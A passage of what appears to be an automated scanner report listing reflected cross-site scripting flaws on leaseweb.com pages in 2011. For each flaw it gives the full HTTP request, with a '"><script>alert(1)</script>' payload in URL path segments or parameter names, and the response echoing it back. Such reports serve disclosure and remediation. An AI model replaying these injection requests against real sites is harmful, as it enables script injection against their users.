4.74. http://www.leaseweb.com/en/shopping-cart/add [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/shopping-cart/add

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77893"><script>alert(1)</script>d352239b194f822b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /en77893"><script>alert(1)</script>d352239b194f822b6/shopping-cart/add?combo_id=1314&dummy%5Btype-64_bit%5D=type-32_bit&article%5B664%5D=664&article%5B142%5D=&article%5B817%5D=&article%5B676%5D=676&bandwidth_type%5BStandard%5D=Standard&traffic_type%5BMetered%5D=Metered&article%5B621%5D=621&article%5B124%5D=124&pid=&comment= HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud/configurator/1314
Cache-Control: max-age=0
Origin: http://www.leaseweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:58:50 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/en77893"><script>alert(1)</script>d352239b194f822b6/shopping-cart/add?combo_id=1314&dummy%5Btype-64_bit%5D=type-32_bit&article%5B664%5D=664&article%5B142%5D=&article%5B817%5D=&article%5B676%5D=676&bandwidth_type%5BStandard%5D=Standard&traffic_type%5BMe
...[SNIP]...
4.75. http://www.leaseweb.com/en/shopping-cart/add [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/shopping-cart/add

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b0f6"><script>alert(1)</script>7635ac06e00d08672 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /en/shopping-cart3b0f6"><script>alert(1)</script>7635ac06e00d08672/add?combo_id=1314&dummy%5Btype-64_bit%5D=type-32_bit&article%5B664%5D=664&article%5B142%5D=&article%5B817%5D=&article%5B676%5D=676&bandwidth_type%5BStandard%5D=Standard&traffic_type%5BMetered%5D=Metered&article%5B621%5D=621&article%5B124%5D=124&pid=&comment= HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud/configurator/1314
Cache-Control: max-age=0
Origin: http://www.leaseweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:59:44 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/shopping-cart3b0f6"><script>alert(1)</script>7635ac06e00d08672/add?combo_id=1314&dummy%5Btype-64_bit%5D=type-32_bit&article%5B664%5D=664&article%5B142%5D=&article%5B817%5D=&article%5B676%5D=676&bandwidth_type%5BStandard%5D=Standard&traffic_type%5BMetered%5D=Meter
...[SNIP]...
4.76. http://www.leaseweb.com/en/shopping-cart/add [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/shopping-cart/add

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbf64"><script>alert(1)</script>83fcdd24711b53e65 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /en/shopping-cart/adddbf64"><script>alert(1)</script>83fcdd24711b53e65?combo_id=1314&dummy%5Btype-64_bit%5D=type-32_bit&article%5B664%5D=664&article%5B142%5D=&article%5B817%5D=&article%5B676%5D=676&bandwidth_type%5BStandard%5D=Standard&traffic_type%5BMetered%5D=Metered&article%5B621%5D=621&article%5B124%5D=124&pid=&comment= HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud/configurator/1314
Cache-Control: max-age=0
Origin: http://www.leaseweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 18:00:48 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/shopping-cart/adddbf64"><script>alert(1)</script>83fcdd24711b53e65?combo_id=1314&dummy%5Btype-64_bit%5D=type-32_bit&article%5B664%5D=664&article%5B142%5D=&article%5B817%5D=&article%5B676%5D=676&bandwidth_type%5BStandard%5D=Standard&traffic_type%5BMetered%5D=Metered&a
...[SNIP]...
4.77. http://www.leaseweb.com/en/vps/express-cloud [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/vps/express-cloud

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d668"><script>alert(1)</script>620112c08e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en6d668"><script>alert(1)</script>620112c08e0/vps/express-cloud HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:44:53 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/en6d668"><script>alert(1)</script>620112c08e0/vps/express-cloud">
...[SNIP]...
4.78. http://www.leaseweb.com/en/vps/express-cloud [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/vps/express-cloud

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1af6"><script>alert(1)</script>317bdcdc48b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/vpse1af6"><script>alert(1)</script>317bdcdc48b/express-cloud HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:47:03 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/vpse1af6"><script>alert(1)</script>317bdcdc48b/express-cloud">
...[SNIP]...
4.79. http://www.leaseweb.com/en/vps/express-cloud [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/vps/express-cloud

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bbba"><script>alert(1)</script>564ba9b85 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/vps/express-cloud9bbba"><script>alert(1)</script>564ba9b85 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:49:21 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/vps/express-cloud9bbba"><script>alert(1)</script>564ba9b85">
...[SNIP]...
4.80. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/vps/express-cloud/configurator/1314

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7ecf"><script>alert(1)</script>6e9355aecd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enc7ecf"><script>alert(1)</script>6e9355aecd7/vps/express-cloud/configurator/1314 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.2.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:47:01 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/enc7ecf"><script>alert(1)</script>6e9355aecd7/vps/express-cloud/configurator/1314">
...[SNIP]...
4.81. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/vps/express-cloud/configurator/1314

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ade0"><script>alert(1)</script>d5851fcaebd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/vps1ade0"><script>alert(1)</script>d5851fcaebd/express-cloud/configurator/1314 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.2.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:48:55 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/vps1ade0"><script>alert(1)</script>d5851fcaebd/express-cloud/configurator/1314">
...[SNIP]...
4.82. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/vps/express-cloud/configurator/1314

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccf0"><script>alert(1)</script>a583e0096d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/vps/express-cloud9ccf0"><script>alert(1)</script>a583e0096d6/configurator/1314 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.2.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:50:16 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/vps/express-cloud9ccf0"><script>alert(1)</script>a583e0096d6/configurator/1314">
...[SNIP]...
4.83. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/vps/express-cloud/configurator/1314

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984fb"><script>alert(1)</script>a17f095b3c2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/vps/express-cloud/configurator984fb"><script>alert(1)</script>a17f095b3c2/1314 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.2.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:51:27 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/vps/express-cloud/configurator984fb"><script>alert(1)</script>a17f095b3c2/1314">
...[SNIP]...
4.84. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/vps/express-cloud/configurator/1314

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65081"><script>alert(1)</script>3b28089c87c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/vps/express-cloud/configurator/131465081"><script>alert(1)</script>3b28089c87c HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.2.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:52:21 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/vps/express-cloud/configurator/131465081"><script>alert(1)</script>3b28089c87c">
...[SNIP]...
4.85. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/vps/express-cloud/configurator/1314

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c05f0"><script>alert(1)</script>a26b52493b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/vps/express-cloud/configurator/1314?c05f0"><script>alert(1)</script>a26b52493b2=1 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.2.10.1303148133

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 17:42:38 GMT
Server: Apache
Pragma: no-cache
Cache-Control: private
Expires: -1
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 113777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/vps/express-cloud/configurator/1314?c05f0"><script>alert(1)</script>a26b52493b2=1">
...[SNIP]...
4.86. http://www.leaseweb.com/flash/lsw_banner_hp.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /flash/lsw_banner_hp.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f976"><script>alert(1)</script>5000c7ae558 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flash4f976"><script>alert(1)</script>5000c7ae558/lsw_banner_hp.swf HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:37:43 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/flash4f976"><script>alert(1)</script>5000c7ae558/lsw_banner_hp.swf">
...[SNIP]...
4.87. http://www.leaseweb.com/flash/lsw_banner_hp.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /flash/lsw_banner_hp.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea376"><script>alert(1)</script>0945beb5808 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flash/lsw_banner_hp.swfea376"><script>alert(1)</script>0945beb5808 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:39:05 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
